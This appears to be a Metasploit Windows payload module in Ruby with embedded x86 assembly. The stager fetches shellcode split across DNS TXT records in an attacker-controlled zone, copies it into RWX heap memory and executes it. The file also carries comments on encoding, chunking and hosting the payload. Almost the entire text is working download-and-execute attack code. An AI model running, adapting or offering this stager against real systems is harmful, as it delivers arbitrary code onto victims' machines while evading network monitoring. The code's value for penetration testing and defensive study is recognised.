## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' module Metasploit3 CachedSize = 275 include Msf::Payload::Windows include Msf::Payload::Single def initialize(info = {}) super(merge_info(info, 'Name' => 'DNS TXT Record Payload Download and Execution', 'Description' => 'Performs a TXT query against a series of DNS record(s) and executes the returned payload', 'Author' => [ 'corelanc0d3r ' ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86 )) # EXITFUNC is not supported deregister_options('EXITFUNC') # Register command execution options register_options( [ OptString.new('DNSZONE', [ true, "The DNS zone to query" ]), ], self.class) end # # Usage : # 1. Generate the shellcode you want to deliver via DNS TXT queries # Make sure the shellcode is alpha_mixed or alpha_upper and uses EDI as bufferregister # Example : # ./msfpayload windows/messagebox TITLE="Friendly message from corelanc0d3r" TEXT="DNS Payloads FTW" R | ./msfencode -e x86/alpha_mixed Bufferregister=EDI -t raw # Output : 654 bytes # 2. Split the alpha shellcode into individual parts of exactly 255 bytes (+ remaining bytes) # In case of 654 bytes of payload, there will be 2 parts of 255 bytes, and one part of 144 bytes # 3. Create TXT records in a zone you control and put in a piece of the shellcode in each TXT record # The last TXT record might have less than 255 bytes, that's fine # The first part must be stored in the TXT record for prefix a. # The second part must be stored in the TXT record for b. # etc # First part must start with a. and all parts must be placed in consecutive records # 4. use the dns_txt_query payload in the exploit, specify the name of the DNS zone that contains the DNS TXT records # Example : /msfpayload windows/dns_txt_query_exec DNSZONE=corelan.eu C # (Example will show a messagebox) # # DNS TXT Records : # a.corelan.eu : contains first 255 bytes of the alpha shellcode # b.corelan.eu : contains the next 255 bytes of the alpha shellcode # c.corelan.eu : contains the last 144 bytes of the alpha shellcode def generate dnsname = datastore['DNSZONE'] wType = 0x0010 #DNS_TYPE_TEXT (TEXT) wTypeOffset = 0x1c queryoptions = 0x248 # DNS_QUERY_RETURN_MESSAGE (0x200) # DNS_QUERY_BYPASS_CACHE (0x08) # DNS_QUERY_NO_HOSTS_FILE (0x40) # DNS_QUERY_ONLY_TCP (0x02) <- not used atm bufferreg = "edi" #create actual payload payload_data = <Ldr mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list next_mod: mov esi, [edx+40] ; Get pointer to modules name (unicode string) movzx ecx, word [edx+38] ; Set ECX to the length we want to check xor edi, edi ; Clear EDI which will store the hash of the module name loop_modname: ; xor eax, eax ; Clear EAX lodsb ; Read in the next byte of the name cmp al, 'a' ; Some versions of Windows use lower case module names jl not_lowercase ; sub al, 0x20 ; If so normalise to uppercase not_lowercase: ; ror edi, 13 ; Rotate right our hash value add edi, eax ; Add the next byte of the name loop loop_modname ; Loop until we have read enough ; We now have the module hash computed push edx ; Save the current position in the module list for later push edi ; Save the current module hash for later ; Proceed to iterate the export address table, mov edx, [edx+16] ; Get this modules base address mov eax, [edx+60] ; Get PE header add eax, edx ; Add the modules base address mov eax, [eax+120] ; Get export tables RVA test eax, eax ; Test if no export address table is present jz get_next_mod1 ; If no EAT present, process the next module add eax, edx ; Add the modules base address push eax ; Save the current modules EAT mov ecx, [eax+24] ; Get the number of function names mov ebx, [eax+32] ; Get the rva of the function names add ebx, edx ; Add the modules base address ; Computing the module hash + function hash get_next_func: ; jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module dec ecx ; Decrement the function name counter mov esi, [ebx+ecx*4] ; Get rva of next module name add esi, edx ; Add the modules base address xor edi, edi ; Clear EDI which will store the hash of the function name ; And compare it to the one we want loop_funcname: ; xor eax, eax ; Clear EAX lodsb ; Read in the next byte of the ASCII function name ror edi, 13 ; Rotate right our hash value add edi, eax ; Add the next byte of the name cmp al, ah ; Compare AL (the next byte from the name) to AH (null) jne loop_funcname ; If we have not reached the null terminator, continue add edi, [ebp-8] ; Add the current module hash to the function hash cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for jnz get_next_func ; Go compute the next function hash if we have not found it ; If found, fix up stack, call the function and then value else compute the next one... pop eax ; Restore the current modules EAT mov ebx, [eax+36] ; Get the ordinal table rva add ebx, edx ; Add the modules base address mov cx, [ebx+2*ecx] ; Get the desired functions ordinal mov ebx, [eax+28] ; Get the function addresses table rva add ebx, edx ; Add the modules base address mov eax, [ebx+4*ecx] ; Get the desired functions RVA add eax, edx ; Add the modules base address to get the functions actual VA ; We now fix up the stack and perform the call to the desired function... finish: mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad pop ebx ; Clear off the current modules hash pop ebx ; Clear off the current position in the module list popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered pop ecx ; Pop off the origional return address our caller will have pushed pop edx ; Pop off the hash value our caller will have pushed push ecx ; Push back the correct return value jmp eax ; Jump into the required function ; We now automagically return to the correct caller... get_next_mod: ; pop eax ; Pop off the current (now the previous) modules EAT get_next_mod1: ; pop edi ; Pop off the current (now the previous) modules hash pop edx ; Restore our position in the module list mov edx, [edx] ; Get the next module jmp.i8 next_mod ; Process this module ; actual routine start: pop ebp ; get ptr to block_api routine ; first allocate some space in heap to hold payload alloc_space: xor eax,eax ; clear EAX push 0x40 ; flProtect (RWX) mov ah,0x10 ; set EAX to 0x1000 (should be big enough to hold up to 26 * 255 bytes) push eax ; flAllocationType MEM_COMMIT (0x1000) push eax ; dwSize (0x1000) push 0x0 ; lpAddress push 0xE553A458 ; kernel32.dll!VirtualAlloc call ebp push eax ; save pointer on stack, will be used in memcpy mov #{bufferreg}, eax ; save pointer, to jump to at the end ;load dnsapi.dll load_dnsapi: xor eax,eax ; put part of string (hex) in eax mov al,0x70 mov ah,0x69 push eax ; Push 'dnsapi' to the stack push 0x61736e64 ; ... push esp ; Push a pointer to the 'dnsapi' string on the stack. push 0x0726774C ; kernel32.dll!LoadLibraryA call ebp ; LoadLibraryA( "dnsapi" ) ;prepare for loop of queries mov bl,0x61 ; first query, start with 'a' dnsquery: jmp.i8 get_dnsname ; get dnsname get_dnsname_return: pop eax ; get ptr to dnsname (lpstrName) mov [eax],bl ; patch sequence number in place xchg esi,ebx ; save sequence number push esp ; prepare ppQueryResultsSet pop ebx ; (put ptr to ptr to stack on stack) sub ebx,4 push ebx push 0x0 ; pReserved push ebx ; ppQueryResultsSet push 0x0 ; pExtra push #{queryoptions} ; Options push #{wType} ; wType push eax ; lpstrName push 0xC99CC96A ; dnsapi.dll!DnsQuery_A call ebp ; test eax, eax ; query ok ? jnz jump_to_payload ; no, jump to payload jmp.i8 get_query_result ; eax = 0 : a piece returned, fetch it get_dnsname: call get_dnsname_return db "a.#{dnsname}", 0x00 get_query_result: xchg #{bufferreg},edx ; save start of heap pop #{bufferreg} ; heap structure containing DNS results mov eax,[#{bufferreg}+0x18] ; check if value at offset 0x18 is 0x1 cmp eax,1 jne prepare_payload ; jmp to payload add #{bufferreg},#{wTypeOffset} ; get ptr to ptr to DNS reply mov #{bufferreg},[#{bufferreg}] ; get ptr to DNS reply copy_piece_to_heap: xchg ebx,esi ; save counter mov esi,edi ; set source mov edi,[esp+0x8] ; retrieve heap destination for memcpy xor ecx,ecx ; clear ecx mov cl,0xff ; always copy 255 bytes, no matter what rep movsb ; copy from ESI to EDI push edi ; save target for next copy push edi ; 2 more times to make sure it's at esp+8 push edi ; inc ebx ; increment sequence xchg #{bufferreg},edx ; restore start of heap jmp.i8 dnsquery ; try to get the next piece, if any prepare_payload: mov #{bufferreg},edx jump_to_payload: jmp #{bufferreg} ; jump to it EOS self.assembly = payload_data super end end